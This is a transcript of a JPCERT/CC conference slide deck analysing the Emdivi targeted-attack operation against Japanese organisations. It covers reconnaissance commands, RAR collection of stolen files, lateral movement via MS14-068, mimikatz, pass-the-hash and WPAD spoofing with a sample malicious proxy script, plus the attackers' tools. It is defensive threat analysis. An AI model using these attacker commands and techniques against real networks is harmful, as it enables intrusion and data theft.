revealing the attack operations targeting japan · dll, data emdivi (t19, lateral movement t20)...
TRANSCRIPT
![Page 1: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/1.jpg)
Revealing the Attack Operations Targeting Japan
JPCERT/CC Analysis Center Shusei Tomonaga Yuu Nakamura
CODE BLUE 2015
![Page 2: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/2.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Agenda
1
1 Introduction
2 Operation A
3 Operation B
![Page 3: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/3.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Agenda
2
1 Introduction
2 Operation A
3 Operation B
![Page 4: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/4.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Self-introduction
Analysis Center at JPCERT Coordination Center Malware analysis, Forensics investigation
3
Shusei Tomonaga
Yuu Nakamura
![Page 5: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/5.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
JPCERT Coordination Center Japan Computer Emergency Response Team Coordination Center
Prevention • Vulnerability
information handling
Monitoring • Information gathering
& analysis & sharing • NW Traffic Monitoring
Response • Incident handling
Early warning information CSIRT establishment support
Industrial control system security International collaboration
Artifact (e.g. Malware) analysis
![Page 6: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/6.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Targeted Attacks handled by JPCERT/CC
5
From April to September 2015
93組織
4組織
130 organizations
93 organizations
4 organizations
Operation A
Operation B
![Page 7: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/7.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Introducing 2 Types of Attack Operations
• Targeting many Japanese organizations since around 2012.
• Emdivi • CloudyOmega (Symantec) • BLUE TERMITE (Kaspersky)
Operation A
• Targeting some Japanese organizations since around 2013.
• APT17 (FireEye)
Operation B
6
![Page 8: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/8.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Agenda
7
1 Introduction
2 Operation A
3 Operation B
![Page 9: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/9.jpg)
Copyright©2015 JPCERT/CC All rights reserved. 8
Characteristics of Operation A
Attacker’s Infrastructure(Compromised Web sites)
Victim organizations (Public offices, private companies)
…
OverseasJapan
Targeted emails Widespread emails Watering hole
![Page 10: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/10.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Details of Internal Intrusion Techniques
9
Initial Compromise
Collecting Information
Lateral Movement
![Page 11: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/11.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Details of Internal Intrusion Techniques
10
Initial Compromise
Collecting Information
Lateral Movement
![Page 12: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/12.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Attack Patterns
11
Timeline of Attack Vector
Disguised Icon
Document File (Exploit
vulnerabilities)
Drive-By Download
2014/05 2015/01 2015/05
2015/07 CVE-2014-7247
CVE-2015-5119 CVE-2015-5122
Medical expense, Health insurance
• In many attacks, malware are disguised with fake icons, compressed with zip or lzh and attached to emails. • Attacks aiming certain targets may lead to correspondence of emails.
2014/09
2014/11
2015/09
![Page 13: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/13.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Details of Internal Intrusion Techniques
12
Initial Compromise
Collecting Information
Lateral Movement
![Page 14: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/14.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Investigation of Compromised Environment
• dir • net
• net view • net localgroup administrators
• ver • ipconfig • systeminfo • wmic
Commands / Programs in OS standard accessories
• csvde • dsquery
Active Directory admin tools sent after the compromise
13
Uses Legitimate tools provided by MS
![Page 15: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/15.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Example of Using dsquery
14
Used in some cases targeting specific individuals
![Page 16: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/16.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Collecting Email Account Information Uses free tools (Similar to NirSoft Mail PassView) Attempts to receive emails from outside May lead to new attack emails (correspondence of emails) Infection spreading from organization to organization
15
![Page 17: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/17.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Collecting Classified / Personal Information
Search Network Drive
Search Targeted Data
Create a Copy of Compressed Files
Download
Delete Evidence
16
![Page 18: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/18.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Search Network Drive (1)
> net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK T: ¥¥FILESV01¥SECRET Microsoft Windows Network OK U: ¥¥FILESV02¥SECRET Microsoft Windows Network
> wmic logicaldisk get caption,providername,drivetype,volumename Caption DriveType ProviderName VolumeName C: 3 OS D: 3 Volume T: 4 ¥¥FILESV01¥SECRET Volume U: 4 ¥¥FILESV01¥SECRET Volume
net use command
wmic command
17
DriveType = 4 ⇒ Network Drive
![Page 19: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/19.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Search Network Drive (2)
> netstat –an TCP 192.168.xx.xx:49217 192.168.yy.yy:445 ESTABLISHED > nbtstat -a 192.168.yy.yy Name Type Status --------------------------------------------- FILESV01 <00> UNIQUE Registered
Combination of netstat Command & nbtstat Command
Port 445 is set as the key to search the access point of file sharing service
18
![Page 20: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/20.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Search Targeted Data
> dir c:¥users¥hoge¥*.doc* /s /o-d c:¥users¥hoge¥AppData¥Local¥Temp Directory 2014/07/29 10:19 28,672 20140820.doc 1 File 28,672 bytes c:¥users¥hoge¥Important Information Directory 2015/08/29 10:03 1,214 Design Document.doc
> dir ¥¥FILESV01¥SECRET ¥¥FILESV¥SECRET Directory 2014/07/11 09:16 [DIR] Management of Partner Companies 2014/09/04 11:49 [DIR] Management of Intellectual Property 2014/08/01 09:27 [DIR] Location information
19
dir command
Not only searches network drive but also compromised computers
/s : Displayed recursively /o-d : Sorted by date
![Page 21: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/21.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Compress, Download, Delete Evidence
> winrar.exe a –r –ed –v300m –ta20140101 %TEMP%¥a.rar “¥¥FILESV01¥SECRET¥Management of Intellectual Property” -n*.ppt* -n*.doc* -n*.xls* -n*.jtd Adding ¥¥FILESV01¥SECRET¥Management of Intellectual Property¥Committee List(2015.05.01).docx OK Adding ¥¥FILESV01¥SECRET¥Management of Intellectual Property¥Framework.ppt OK Adding ¥¥FILESV01¥SECRET¥Management of Intellectual Property¥Application List.xlsx OK Adding ¥¥FILESV01¥SECRET¥Management of Intellectual Property¥Design Document.jtd OK ・ ・
20
Compressed with RAR
RAR files are sent to C&C servers and deleted
Documents are compressed per folder z
![Page 22: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/22.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Details of Internal Intrusion Techniques
21
Initial Compromise
Collecting Information
Lateral Movement
![Page 23: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/23.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Methods Used to Spread Infection
• Exploiting vulnerabilities (MS14-068 + MS14-058)
• Investigating SYSVOL scripts • Password list-based attack • Exploiting Built-in Administrator
password • Setting malware in file servers • Exploiting WPAD • Others
Patterns of spreading infection
22
![Page 24: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/24.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Exploiting Vulnerabilities (MS14-068 + MS14-058)
23
Domain Controller
PC-A
PC-B
1. Escalate privilege (MS14-058) and dump user’s password with mimikatz
2. Exploit MS14-068 vulnerability and gain Domain Admin privileges
3. Upload mimikatz to DC and dump admin’s passwords
4. Copy malware to PC-B
5. Register a task in order to execute malware
6. Malware executes according to the task
![Page 25: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/25.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Investigating SYSVOL Scripts
24
• In some cases, passwords are found in logon script, etc.
Key Point
Attacker’s Infrastructure
C2 Server
3. Search admin’s password
PC-A PC-B
6. Malware executes according to the task
2. Download
1. Download logon script, compress and archive
Domain Controller
5. Register a task in order to execute malware
4. Copy malware to PC-B
![Page 26: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/26.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Password List-based Attack
25
PC-A PC-B 4. Register a task
3. Copy malware
1. Get user’s list of Domain Admins
5. Execute
Domain Controller
2. Attempts logon with logon.exe
• Attempts logon by using an approximately 10-30 line password list and the user’s list of Domain Admins
• Uses a tool called logon.exe (self-built?)
Key Point
![Page 27: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/27.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
• An effective measure when there is no way to exploit Domain environment
• Need to hash passwords or dump passwords
Key Point
Exploiting Built-in Administrator Password
26
PC-A PC-B
3. Copy malware
1. Escalate privilege (UAC bypass) and dump user’s password
5. Execute
4. Register a task
net use ¥¥PC-B¥IPC$ [password] /u:Administrator
2. Pass the hash or net use
![Page 28: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/28.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
• Effective when there is no other measure
Key Point
Setting Malware in File Servers
27
PC-A PC-B
1. Replace the existing file with malware disguised with fake icons
2. Execute malware in file servers
File Server
![Page 29: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/29.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Exploiting WPAD
— Turned on by default — Get automatic configuration script from either
URL specified by DHCP server, or http://wpad/wpad.dat
28
WPAD (Web Proxy Auto-Discovery)
![Page 30: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/30.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Exploiting WPAD (Step 1: NetBIOS Spoofing)
29
• Effective in an environment where WPAD is not configured
• NetBIOS Spoofing
Key Point
PC-A PC-B
2. Name query response (I am WPAD)
1. Broadcast: Name query NB WPAD
wpad.exe
![Page 31: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/31.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Exploiting WPAD (Step 2: Fake WPAD Server)
30
PC-A PC-B
4. Response
wpad.exe
function FindProxyForURL(url, host) { if (myIpAddress() != “[PC-A addr]”) { return ‘PROXY wpad:8888;DIRECT’; } return ‘DIRECT’; }
wpad.dat (automatic configuration script)
3. Request http://wpad/wpad.dat
![Page 32: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/32.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Exploiting WPAD (Step 3: Man in the Middle Proxy)
31
PC-A PC-B
5. Embed iframe in attacker’s Web site wpad.exe
6. Drive-by download attack
Attacker’s Infrastructure
Attacker’s Web Site
Web site
![Page 33: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/33.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Summary: Methods of Spreading Infection
Method AD Privilege Escalation Note
MS14-068 Necessary Unnecessary / Necessary for
password dump
Risk exists when DC is unpatched
SYSVOL Search Necessary Unnecessary
Brute Force Attack (Password List Attack)
Necessary Unnecessary Risk exists when the password is weak
Abusing Built-in Administrator Unnecessary Necessary Presumes that the
password is the same
Exploiting File Servers Unnecessary Unnecessary
Risk exists when the file is disguised to one that many users open
Exploiting WPAD Unnecessary Unnecessary Situations are limited
32
![Page 34: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/34.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
DETAILS OF TOOLS AND MALWARE
33
![Page 35: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/35.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Characteristics of Malware
34
Malware Overview File format
Form of attack
Emdivi (t17) HTTP BOT EXE Intrude
Tools Password dump, etc. EXE, etc.
usp10jpg Download (low-frequency communication)
DLL, data
Lateral Movement Emdivi (t19, t20)
HTTP BOT (highly sophisticated than t17)
EXE
BeginX Remote shell tool EXE
GStatus HTTP BOT (low-frequency communication)
EXE,DLL Conceal?
Reference : [Ayaka Funakoshi. A study on malware characteristics and its effects observed in targeted attacks. MWS, 2015]
Different types of malware reside depending on the phase and scale of damage of the attack
![Page 36: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/36.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Tools
35
Type Overview Filename
Password dump Pass-the-hash
Quarks PwDump qp.exe, qd.exe, QDump.exe, etc. MimikatzLite gp.exe Windows credentials Editor wce.exe, ww.exe
Mimikatz mz.exe, mimikatz.exe, mimikatz.rar (sekurlsa.dll)
Vulnerability exploitation
MS14-068 (CVE-2014-6324)
ms14-068.exe ms14-068.tar.gz
MS14-058 (Privilege escalation) (CVE-2014-4113) 4113.exe
UAC bypass UAC bypass tool msdart.exe, puac.exe, etc.
Packet transmit Htran, proxy adaptive Htran htproxy.exe, etc.
Mail account theft Similar to NirSoft Mail PassView CallMail.exe, outl.exe , etc.
Utility
Attempt logon based on list logon.exe WinRAR archiver yrar.exe, rar,exe, etc.
Highly sophisticated dir command dirasd.exe, etc.
Change timestamp timestomp.exe
![Page 37: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/37.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Emdivi (t17)
Repeatedly upgraded the version in the past year and implemented new commands
36
Command Date of Implementation DOABORT DOWNBG GETFILE LOADDLL SETCMD
SUSPEND UPLOAD VERSION
GOTO May 2015 CLEARLOGS August 2015
HTTP BOT with basic functions
![Page 38: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/38.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Emdivi (t20)
The number of implemented commands have increased and decreased in the past year. — 18-41 (based on JPCERT/CC’s study)
In some cases, the targeted organization’s proxy server address is hard-coded.
May only run on specific computers (encryption of data by computer SID)
37
Highly Sophisticated Emdivi
![Page 39: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/39.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
usp10jpg
Communication performed once a day Able to specify the day of week of communication Tend to be set to computers that are not infected with Emdivi (secondary infection) DLL Preloading Attack
38
Download (low-frequency communication)
dwmapi.dll, etc. ***.DAT Application
Exploit specific DLL Search Order and load malicious DLL
Read data and execute
![Page 40: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/40.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Difficulty to detect Usp10jpg
39
Attacker’s Infrastructure
Computer Infected
with Emdivi
May be left undetected due to low-frequency communication usp10jpg
Easy to detect due to high-frequency communication
![Page 41: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/41.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
BeginX
BeginX Server — Listens to specific ports and waits for commands — Both UDP and TCP versions available
BeginX Client — Client which sends commands to BeginX Server — Controlled via Emdivi
40
Remote Shell Tool
![Page 42: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/42.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Image of Using BeginX
41
Attacker’s Infrastructure
Segment (unable to connect to Internet)
Computer Infected
with Emdivi
BeginX Server
BeginX Client
Unable to control by Emdivi infection
Able to control via BeginX
Emdivi
![Page 43: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/43.jpg)
Copyright©2015 JPCERT/CC All rights reserved. 42
Not found in many organizations, but...
Bot Function — Get drive information — Execute arbitrary shell command — Process list — Screen related functions
HTTP BOT different from Emdivi
GStatus
![Page 44: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/44.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
GStatus Web Panel (Admin Screen)
43
![Page 45: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/45.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
ANALYSIS TOOLS
44
emdivi_string_decryptor.py
![Page 46: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/46.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
emdivi_string_decryptor.py
• IDAPython • Used to analyze Emdivi • Decode encoded strings
emdivi_string_decryptor.py
• t17, 19, 20
Supported version
45
![Page 47: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/47.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
emdivi_string_decryptor.py
46
Emdivi encoded strings
![Page 48: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/48.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
emdivi_string_decryptor.py
47
Difference depending on version string
Ver 17 Ver 19 or 20 Ver 20
Encrypt XxTEA encrypt XxTEA decrypt AES decrypt
Decrypt XxTEA decrypt XxTEA encrypt AES encrypt
Key
MD5( MD5(base64(ver)) + MD5(key_string) )
Scanf( "%x", Inc_Add( ver17_key ) )
Inc_Add( ver17_key )
![Page 49: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/49.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
emdivi_string_decryptor.py
48
![Page 50: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/50.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
emdivi_string_decryptor.py
49
![Page 51: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/51.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
DEMO
50
![Page 52: Revealing the Attack Operations Targeting Japan · DLL, data Emdivi (t19, Lateral Movement t20) HTTP BOT (highly sophisticated than t17) EXE BeginX Remote shell tool EXE GStatus HTTP](https://reader031.vdocuments.mx/reader031/viewer/2022011917/5ff619a166e2352d1958b5ab/html5/thumbnails/52.jpg)
Copyright©2015 JPCERT/CC All rights reserved.
Agenda
51
1 Introduction
2 Operation A
3 Operation B
